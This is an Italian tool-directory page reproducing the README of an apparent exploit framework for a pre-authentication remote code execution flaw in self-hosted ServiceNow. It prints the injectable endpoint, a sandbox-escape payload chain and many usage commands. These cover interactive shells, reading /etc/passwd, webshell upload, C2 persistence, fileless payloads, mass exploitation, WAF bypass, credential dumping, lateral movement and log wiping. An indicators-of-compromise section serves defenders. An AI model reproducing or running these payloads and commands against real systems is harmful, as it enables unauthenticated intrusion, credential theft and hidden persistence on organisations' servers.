Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 Framework RCE Pre-Auth ServiceNow 🔥 Iniezione JS → Evasione sandbox → RCE → Root. Funzionalità: --detect, --exec, shell reverse/interattiva, threading batch, bypass WAF, persistenza, movimento laterale, dump delle credenziali, esecuzione fileless, pulizia delle tracce. 🛡️ CVSS 9.5 sfruttato attivamente. Solo uso autorizzato e legale. Rimani legale. 🔒 | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
Escalation di PrivilegiScanner di VulnerabilitàMeccanismi di PersistenzaExploitMovimento LateraleSfruttamento di Applicazioni WebPost-ExploitBypass WAFPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2026-6875 Framework RCE Pre-Auth ServiceNow 🔥 Iniezione JS → Evasione sandbox → RCE → Root. Funzionalità: --detect, --exec, shell reverse/interattiva, threading batch, bypass WAF, persistenza, movimento laterale, dump delle credenziali, esecuzione fileless, pulizia delle tracce. 🛡️ CVSS 9.5 sfruttato attivamente. Solo uso autorizzato e legale. Rimani legale. 🔒

Strumento di Accesso Remoto
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

Vedi Repository
329 giorni faNon ancora revisionato
Condividi

CVE-2026-6875

CVE-2026-6875 - Framework di Exploit RCE Pre‑Auth di ServiceNow e Verificatore PoC 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

Piattaforma AI di ServiceNow — Iniezione JavaScript → Evasione Sandbox → RCE → Privesc Root

Framework di Exploit e Verificatore Sicuro
Solo per test di sicurezza autorizzati.


⚖️ Disclaimer Legale e Uso Responsabile

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati.

Gli autori e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo software. Gli utenti sono gli unici responsabili di assicurarsi di avere il permesso scritto esplicito del proprietario del target prima di testare. L'accesso non autorizzato ai sistemi informatici è illegale ai sensi del Computer Fraud and Abuse Act (CFAA) e di leggi simili in tutto il mondo.

Utilizzando questo software, accetti di:

  • Utilizzarlo solo su sistemi di tua proprietà o per i quali hai il permesso esplicito di test.
  • Rispettare tutte le leggi locali, statali e federali applicabili.
  • Non utilizzarlo per attività dannose, distruttive o illegali.

⚠️ AVVERTENZA: Questa vulnerabilità è attivamente sfruttata in natura. L'uso non autorizzato può comportare gravi conseguenze legali.


🔥 Panoramica della Vulnerabilità

CVE-2026-6875 è una vulnerabilità critica di Esecuzione Remota di Codice (RCE) non autenticata nella Piattaforma AI di ServiceNow (ex Now Platform). Consente agli aggressori di bypassare la sandbox degli script ed eseguire comandi di sistema arbitrari con i privilegi dell'applicazione ServiceNow.

Come funziona:

  1. Iniezione JavaScript: L'endpoint assessment_thanks.do accetta un parametro sysparm_assessable_type. Anteponendo javascript: al valore, un aggressore inietta codice JavaScript arbitrario.

  2. Evasione della Sandbox: Un sofisticato gadget di evasione della sandbox (che combina DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor e Class.create) rimuove la restrizione della sandbox JavaScript.

  3. Esecuzione Remota di Codice: Il codice Java iniettato (tramite java.lang.Runtime.exec()) viene eseguito con i privilegi dell'applicazione ServiceNow, consentendo il pieno compromesso del sistema.

  4. Escalation dei Privilegi: I moduli post‑exploitation tentano di elevare i privilegi a root tramite configurazioni sudo errate, binari SUID, cron job scrivibili o exploit del kernel.

Dati Chiave:


🛠️ Framework di Exploit (exploit.py)

L'exploit weaponizzato completo combina l'iniezione JavaScript e l'evasione della sandbox per ottenere l'esecuzione remota di codice, con moduli post‑exploitation avanzati per persistenza, movimento laterale e dump delle credenziali.

✨ Funzionalità

Comandi della Shell Interattiva


🕵️ Verificatore Sicuro (verifier.py)

Il verificatore sicuro esegue un rilevamento non intrusivo della vulnerabilità senza eseguire payload dannosi o apportare modifiche al sistema.

✨ Funzionalità


📦 Installazione e Requisiti

Prerequisiti

  • Python 3.6+
  • pip (per la libreria requests)

Installare le Dipendenze

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py usa solo la libreria standard per le funzionalità principali; requests è richiesto solo per la funzionalità --detect, le notifiche --webhook e il verificatore sicuro.


🚀 Esempi di Utilizzo

[1] Verificatore Sicuro (verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] Framework di Exploit (exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 Versioni Interessate

⚠️ Importante: Le istanze ServiceNow Cloud vengono patchate automaticamente. Questa vulnerabilità colpisce principalmente le implementazioni self‑hosted.


🧠 Analisi Tecnica Approfondita

1. Iniezione JavaScript (CVE-2026-6875)

La vulnerabilità risiede nell'endpoint assessment_thanks.do, che accetta un parametro sysparm_assessable_type. Fornendo un valore che inizia con javascript:, la piattaforma valuta il successivo codice JavaScript nel contesto di sistema.

Endpoint Vulnerabile:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. Gadget di Evasione della Sandbox

Il codice iniettato è inizialmente confinato in una sandbox. Tuttavia, sfruttando la seguente catena:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

La sandbox viene bypassata, garantendo l'accesso completo a classi Java come java.lang.Runtime.

3. Moduli Post‑Exploitation

Dump delle Credenziali

Cerca nei file .properties, .xml, .conf password, chiavi API e segreti:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

Persistenza

Installa backdoor tramite:

  • Linux: Cron job (*/5 * * * *), servizi systemd, chiavi SSH
  • Windows: Attività pianificate (schtasks), chiavi di esecuzione del Registro di sistema

Movimento Laterale

Scansiona la sottorete locale per altre istanze ServiceNow o host SSH e riutilizza le credenziali scoperte.

Esecuzione Fileless

Compila una classe Java al volo, la carica tramite ClassLoader e la esegue in memoria (nessuna scrittura su disco).

Tecniche di Bypass WAF

  1. Doppia codifica URL
  2. Commenti JavaScript ({/*comment*/})
  3. Escaping Unicode (\u0077 per w)
  4. Iniezione di spazi bianchi
  5. Suddivisione delle parole chiave (ne\u0077 per new)
  6. Selezione casuale della tecnica

🔍 Indicatori di Compromissione (IoC)

Analisi dei Log

Cerca nei tuoi log ServiceNow:

  • extraweb_access.log – richieste a /assessment_thanks.do con sysparm_assessable_type contenente:
    • javascript:
    • Stringhe codificate in Base64
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

File System

  • File inattesi in /var/tmp/ (ad es., shell.jsp, script .sh)
  • /etc/passwd, /etc/shadow o ~/.ssh/authorized_keys modificati
  • Nuovi cron job (crontab -l)
  • Nuovi servizi systemd (/etc/systemd/system/)

Processi

  • Processi sospetti (/bin/bash -i, nc, curl, wget, python -c)
  • Connessioni di rete inattese verso IP esterni

Rete

  • Connessioni in uscita dal server ServiceNow verso IP non autorizzati
  • Connessioni reverse shell su porte insolite

📚 Riferimenti

  • NVD - CVE-2026-6875
  • Avviso di Sicurezza ServiceNow (KB3137947)
  • Catalogo CISA KEV
  • Searchlight Cyber – Analisi Tecnica
  • The Hacker News – Zero‑Day di ServiceNow Sfruttato

🔗 Altri Exploit

[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

Scarica lo strumento
AttributoValore
📅 Scoperta1 aprile 2026 (Searchlight Cyber)
⚠️ Punteggio CVSS9.5 (CRITICO)
📋 CISA KEVAggiunta il 13 luglio 2026
🎯 Prodotti InteressatiPiattaforma AI di ServiceNow self‑hosted
🔄 Versioni CorretteBrazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13
🔓 AutenticazioneNon richiesta (Pre‑Auth)
🌍 Sfruttamento AttivoConfermato in natura (luglio 2026)
FunzionalitàDescrizione
🚀 Iniezione JavaScriptInietta il payload tramite il parametro sysparm_assessable_type.
💻 Evasione della SandboxBypassa la sandbox degli script di ServiceNow per eseguire codice Java arbitrario.
🔐 Shell InterattivaAvvia una shell live con supporto per più comandi.
👑 Privesc RootVerifica configurazioni sudo errate, binari SUID e cron job.
📁 Operazioni sui FileCarica webshell, legge/scarica file tramite codifica base64.
🌐 Scansione in BatchSfrutta più target in massa con il threading (flag -l).
🎯 Rilevamento SicuroFlag --detect opzionale per la verifica non intrusiva della vulnerabilità.
⚙️ Bypass WAFTecniche di offuscamento integrate per eludere WAF/IDS (6 tecniche).
🧩 PersistenzaInstalla backdoor cron/systemd/schtasks.
🔍 Movimento LateraleScansiona la rete locale per altri host vulnerabili e tenta la propagazione SSH/SSRF.
🧹 Pulizia delle TracceRimuove log, cronologia bash e trail di audit.
💾 Esecuzione FilelessUsa Java ClassLoader per eseguire payload residenti in memoria senza scrivere su disco.
🔌 Server di CallbackServer HTTP integrato per ricevere l'output dei comandi (opzionale).
📢 Notifiche WebhookInvia i risultati a un URL personalizzato (Slack, Discord, ecc.).
🪟 Multi‑PiattaformaSupporta target Linux e Windows (cmd.exe / PowerShell).
🔒 Thread‑SafeUsa meccanismi di blocco per operazioni concorrenti.
📊 Rilevamento VersioneRileva la versione di ServiceNow (Zurich/Brazil/Australia/Yokohama).
ComandoDescrizione
exec <cmd>Esegue un comando di sistema
upload <local> [remote]Carica una webshell sul target
download <remote>Scarica e mostra il contenuto del file
privescTenta l'escalation dei privilegi
reverse <host> <port>Invia una reverse shell
dumpcredEstrae le credenziali dalle configurazioni di ServiceNow
persist <host> <port>Installa la persistenza (cron/systemd/schtasks)
lateralTenta il movimento laterale
cleanPulisce le tracce (log, cronologia)
memory <host> <port>Esegue il payload Java fileless
exitEsce dalla shell interattiva
FunzionalitàDescrizione
🔍 Rilevamento ServiceNowIdentifica le istanze ServiceNow tramite più endpoint.
📊 Rilevamento VersioneRileva release ServiceNow specifiche e livelli di patch.
🧪 Test di Iniezione JavaScriptVerifica la vulnerabilità di iniezione utilizzando payload gs.print() sicuri.
🔒 Test di Evasione della SandboxVerifica l'evasione della sandbox senza comandi distruttivi.
📈 Punteggio di ConfidenzaFornisce una percentuale di confidenza (85‑95%) basata sulle evidenze.
📋 Output JSONEsporta i risultati in formato JSON per il reporting.
🔄 Scansione di MassaScansiona più target con supporto al threading.
🎯 Non IntrusivoEsegue solo il benigno uname -a per le informazioni di sistema.
Release di ServiceNowVersioni VulnerabiliVersioni Corrette
BrazilEA, GACorretta (post‑GA)
AustraliaPrima della Patch 2Patch 2+
ZurichPrima della Patch 7b, Patch 9Patch 7b, Patch 9+
YokohamaPrima della Patch 12 Hot Fix 1bPatch 12 Hot Fix 1b, Patch 13
Altre releaseSconosciuteConsultare l'avviso ufficiale